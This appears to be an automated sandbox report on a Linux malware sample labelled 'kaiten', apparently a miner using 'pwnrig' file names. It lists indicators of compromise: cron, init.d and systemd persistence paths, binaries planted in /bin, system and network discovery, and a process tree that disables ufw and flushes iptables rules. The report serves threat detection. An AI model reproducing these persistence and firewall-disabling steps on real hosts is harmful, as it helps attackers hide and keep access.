kaiten | e74418466797c11a2fea1fa024403b0e6bf46d568e5bfa6fe304c524708f1f8c

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

Creates/modifies Cron job 1 TTPs 17 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

Processes:

d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561ateesedcrontab

description	ioc	process
File opened for modification	/etc/cron.hourly/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.d/sed9GTDJf	sed
File opened for modification	/etc/cron.hourly/sediHF9mf	sed
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/var/spool/cron/crontabs/tmp.H0xTww	crontab
File opened for modification	/var/spool/cron/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.daily/seduVEBfg	sed
File opened for modification	/etc/cron.d/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.daily/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.weekly/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.monthly/.lib-knlib4	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/etc/cron.monthly/sedNHl54h	sed
File opened for modification	/etc/cron.weekly/sedRNlT4e	sed

Enumerates active TCP sockets 1 TTPs 3 IoCs

Gets active TCP sockets from /proc virtual filesystem.

System Network Connections Discovery

T1049

Processes:

lsoflsofd8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a

description	ioc	process
File opened for reading	/proc/net/tcp	lsof
File opened for reading	/proc/net/tcp	lsof
File opened for reading	/proc/net/tcp	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 1 TTPs 3 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

Processes:

d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561ateesed

description	ioc	process
File opened for modification	/etc/init.d/dpkg-deb-package	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sedRJFd9d	sed

Modifies systemd 1 TTPs 3 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence

Boot or Logon Autostart Execution

Processes:

d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561atee

description	ioc	process
File opened for modification	/etc/systemd/system/dpkg-deb-package.service	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee

Reads hardware information 1 TTPs 28 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

Writes file to system bin folder 1 TTPs 5 IoCs

Hijack Execution Flow

Processes:

d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561acpcpcpcp

description	ioc	process
File opened for modification	/bin/dpkg-debian	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/sysdr	cp

Changes its process name 1 IoCs

Processes:

description ioc pid

Changes the process name, possibly in an attempt to hide itself (sysv-install) 1728

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	1728

Checks CPU configuration 1 TTPs 6 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571grepgrep-bash-18a624c0-9026-4abf-81dd-8b579c9ce571grepgrep

description	ioc	process
File opened for reading	/proc/cpuinfo	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep

Reads CPU attributes 1 TTPs 17 IoCs

System Information Discovery

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571pgreppgrep-bash-18a624c0-9026-4abf-81dd-8b579c9ce571pspspgreppgreppspspspspkill

description	ioc	process
File opened for reading	/sys/devices/system/cpu/possible	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/possible	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/types	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/types	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

Reads system network configuration 1 TTPs 40 IoCs

Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery

T1016

Processes:

lsoflsofd8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a

description	ioc	process
File opened for reading	/proc/net/netlink	lsof
File opened for reading	/proc/net/unix	lsof
File opened for reading	/proc/net/udplite	lsof
File opened for reading	/proc/net/sctp/eps	lsof
File opened for reading	/proc/net/sctp/eps	lsof
File opened for reading	/proc/net/icmp	lsof
File opened for reading	/proc/net/ipx	lsof
File opened for reading	/proc/net/sockstat6	lsof
File opened for reading	/proc/net/sockstat6	lsof
File opened for reading	/proc/net/tcp	lsof
File opened for reading	/proc/net/tcp6	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/net/udp	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/net/udp6	lsof
File opened for reading	/proc/net/udplite6	lsof
File opened for reading	/proc/net/tcp	lsof
File opened for reading	/proc/net/udp	lsof
File opened for reading	/proc/net/unix	lsof
File opened for reading	/proc/net/udp6	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/net/tcp6	lsof
File opened for reading	/proc/net/sockstat	lsof
File opened for reading	/proc/net/sctp/assocs	lsof
File opened for reading	/proc/net/ipx	lsof
File opened for reading	/proc/net/raw6	lsof
File opened for reading	/proc/net/tcp6	lsof
File opened for reading	/proc/net/raw6	lsof
File opened for reading	/proc/net/ax25	lsof
File opened for reading	/proc/net/packet	lsof
File opened for reading	/proc/net/sctp/assocs	lsof
File opened for reading	/proc/net/ax25	lsof
File opened for reading	/proc/net/packet	lsof
File opened for reading	/proc/net/sockstat	lsof
File opened for reading	/proc/net/udplite	lsof
File opened for reading	/proc/net/tcp	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/net/raw	lsof
File opened for reading	/proc/net/udp6	lsof
File opened for reading	/proc/net/udplite6	lsof
File opened for reading	/proc/net/icmp	lsof
File opened for reading	/proc/net/raw	lsof
File opened for reading	/proc/net/netlink	lsof
File opened for reading	/proc/net/udp	lsof

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

Processes:

-bash-18a624c0-9026-4abf-81dd-8b579c9ce571-bash-18a624c0-9026-4abf-81dd-8b579c9ce571systemctld8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561asystemctlmodprobesystemctlsystemctl

description	ioc	process
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/dax/target_node	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/meminfo	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/dax/target_node	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/devices/virtual/dmi/id	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/kernel/mm/hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/hugepages	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/cpumap	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/dax/devices	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/dax/devices/target_node	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
File opened for reading	/sys/bus/node/devices/node0/access1/initiators	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pkillpslsoflsofsystemctld8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561apspspspspgreppgrepawkpgreppspgrepsystemctl

description	ioc	process
File opened for reading	/proc/587/cmdline	pkill
File opened for reading	/proc/1074/stat	ps
File opened for reading	/proc/242/fdinfo/4	lsof
File opened for reading	/proc/504/stat	lsof
File opened for reading	/proc/1/fdinfo/142	lsof
File opened for reading	/proc/455/fdinfo/35	lsof
File opened for reading	/proc/200/cmdline	pkill
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/fdinfo/19	lsof
File opened for reading	/proc/1004/fd	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/21/cmdline	ps
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/1/fdinfo/90	lsof
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/77/stat	ps
File opened for reading	/proc/1063/stat	ps
File opened for reading	/proc/455/fdinfo/5	lsof
File opened for reading	/proc/24/fd	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/954/stat	ps
File opened for reading	/proc/1440/cmdline	ps
File opened for reading	/proc/440/fd	lsof
File opened for reading	/proc/1108/fd	lsof
File opened for reading	/proc/140/status	pgrep
File opened for reading	/proc/200/stat	ps
File opened for reading	/proc/1072/fdinfo/2	lsof
File opened for reading	/proc/1457/status	pkill
File opened for reading	/proc/242/fdinfo/55	lsof
File opened for reading	/proc/895/fdinfo/12	lsof
File opened for reading	/proc/171/status	pgrep
File opened for reading	/proc/166/stat	ps
File opened for reading	/proc/1348/fdinfo/1	lsof
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/85/fd	lsof
File opened for reading	/proc/1338/cmdline	ps
File opened for reading	/proc/1022/cmdline	pgrep
File opened for reading	/proc/9/status	pgrep
File opened for reading	/proc/1442/stat	ps
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/105/status	pkill
File opened for reading	/proc/674/cmdline	pkill
File opened for reading	/proc/1073/status	ps
File opened for reading	/proc/689/fdinfo/57	lsof
File opened for reading	/proc/693/status	pgrep
File opened for reading	/proc/641/status	pgrep
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/895/fdinfo/12	lsof
File opened for reading	/proc/242/cmdline	pgrep
File opened for reading	/proc/641/status	ps
File opened for reading	/proc/1697/cmdline	ps
File opened for reading	/proc/1078/fdinfo/8	lsof
File opened for reading	/proc/908/status	ps
File opened for reading	/proc/85/stat	ps
File opened for reading	/proc/175/status	ps
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1080/fd	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for reading	/proc/1223/status	ps
File opened for reading	/proc/173/cmdline	pkill
File opened for reading	/proc/self/auxv	ps
File opened for reading	/proc/175/status	pgrep
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/242/fdinfo/75	lsof
File opened for reading	/proc/895/fdinfo/10	lsof
File opened for reading	/proc/1077/fdinfo/10	lsof
File opened for reading	/proc/1079/fd	lsof

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

Processes:

shd8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a-python37-590b56ce-9e47-4539-accf-0eb74a649a38-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

description	ioc	process
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/-python37-590b56ce-9e47-4539-accf-0eb74a649a38	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/tmp/.bashirc	-python37-590b56ce-9e47-4539-accf-0eb74a649a38
File opened for modification	/tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571	d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
File opened for modification	/tmp/.lock	-bash-18a624c0-9026-4abf-81dd-8b579c9ce571

/tmp/d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
/tmp/d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
1⤵
- Creates/modifies Cron job
- Enumerates active TCP sockets
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Reads system network configuration
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1442
- /usr/bin/bash
  bash -c "ufw disable"
  2⤵
  PID:1446
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1446
- - /usr/sbin/iptables
    /usr/sbin/iptables -V
    3⤵
    PID:1450
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1451
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1452
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:1453
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1455
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1459
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1460
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1461
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1462
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1463
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1464
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1465
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1466
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1467
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1468
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1469
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:1470
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1471
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1472
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1473
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1474
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1475
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1476
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1477
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1478
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1479
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1480
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:1481
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1482
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1483
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1484
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1485
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1486
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1487
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1488
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1489
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1490
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1491
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1492
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1493
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1494
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1495
